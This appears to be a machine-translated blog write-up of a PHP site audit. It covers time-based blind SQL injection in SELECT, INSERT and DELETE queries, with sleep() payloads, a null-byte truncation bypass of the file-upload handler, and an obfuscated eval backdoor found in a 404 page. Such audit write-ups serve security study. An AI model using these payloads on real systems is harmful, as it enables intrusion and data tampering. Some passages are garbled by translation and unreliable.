0 x00 preface

As we all know, at present this kind of generation brush network is more common on the network, so today prepare to carry on a wave of audit to this kind of system.

The environment used for this article is THE PHP5.2.17 version of _PHPStudy +apache_ 0x01 text

  • SQL injection

First, we opened the Mage’s Seay audit system. Because SQL injection vulnerabilities are common, I tend to audit them first.

However, I find the select type injection description shown here to be understated. So THIS time I plan to use the sensitive function tracing method to mine



Oh, there could be SQL injection vulnerabilities. Let’s click inside.

elseif ($my=='edit\_submit') { $cid = $\_GET\['cid'\]; $rows = $DB->get\_row('select * from shua\_class where cid=\\'' . $cid . '\\' limit 1'); if (! $rows) {exit('<script language=\\'javascript\\'>alert(\\' Current record does not exist! \ \ '); history.go(-1); </script>'); }Copy the code

This hole is coming.
c i d Variables are passed directly in without filtering s q l In the statement. Due to the The CID variable is passed directly into the SQL statement without filtering. Due to the DB->get_row returns the number of existing rows. So we can only judge by blind injection here.

Content for

/admin/classlist.php? my=edit_submit&amp; &amp; cid=1' and sleep(10)--+Copy the code

And then continue to look at the file

if ($my=='add\_submit') { $name = $\_POST\['name'\]; If ($name==NULL) {exit('<script language=\\'javascript\\'>alert(\\' save error, please make sure everything is not empty! \ \ '); history.go(-1); </script>'); } else { $sql = 'insert into \`shua_class\` (\`name\`,\`active\`) values (\\'' . $name . '\\',\\'1\\')';Copy the code

SQL injection of type INSERT is performed when &name is not null.

Just like the picture above

Content:name=yanxia'+or+sleep(10),'1')%23

Okey, keep scrolling down. We will find an SQL injection of type DELETE

elseif ($my=='delete') { $cid = $\_GET\['cid'\]; $sql = 'DELETE FROM shua\_class WHERE cid=\\'' . $cid . '\\''; If ($DB - > query (SQL) $) {exit (' < script language = \ \ "javascript \ \ '> alert (\ \' deleted successfully! \ \ '); window.location.href=\\'classlist.php\\'; </script>'); } else {exit('<script language=\\'javascript\\'>alert(\\' deletion failed! ' . $DB->error() . '\\'); history.go(-1); </script>'); }Copy the code

Content is as follows:

admin/classlist.php? my=delete&amp; cid=1' and sleep(10)--+Copy the code

(Similar SQL injections exist elsewhere and I won’t write them out.)

  • File upload

Here, we audit by locating the file upload point first.

Open the address admin/shopedit.php? My =add, found a file upload place



Let’s open the source code and look at the logic

case 'uploadimg': if($\_POST\['do'\]=='upload'){ $type = $\_POST\['type'\]; $filename = $type.'_'.md5\_file($\_FILES\['file'\]\['tmp\_name'\]).'.png'; $fileurl = 'assets/img/Product/'.$filename; if(copy($\_FILES\['file'\]\['tmp_name'\], ROOT.'assets/img/Product/'.$filename)){ exit('{"code":0,"msg":"succ","url":"'.$fileurl.'"}'); } else {exit (' {" code ": 1," MSG ":" upload fails, please make sure that there are local write access "} "); } } exit('{"code":-1,"msg":"null"}'); break;Copy the code

We can find that md5_file(\_FILES\[‘ file ‘\]\[‘ TMP \_name’ \]) md5 encryption is used here. So we can’t start with file and TMP \_name. whileThe type variable happens to be under our control. So we can use 00 truncation to achieve the effect of file upload. I put the operation down.)





It says.jpg but it’s actually truncated. Let’s open the catalog and see



  • The back door

I saw it when I used the automatic audit feature. A 404 page has eval. So it’s most likely the author left behind a back door.



Check it out. It’s true

Then I want to see if the code is executing. Common sensitive functions are eval(), assert(),preg_replace(),call_user_func(),call_user_func_arry(),arry_map(), and so on.

Here comes the highlight. When I searched preg_replace, I found the following image





Oh, no problem. Is it a back door

And I find that it is an encryption of gzinflate(base64_decode()). Let’s export his source code to see





0 x02 end

That’s the end of this article.

Code auditing is fun. It’s hard to make progress if you don’t do it yourself! Everybody refueling duck with me

  • Posted at 2021-07-20 18:12:28

  • Reading (2886)

  • Classification: Vulnerability analysis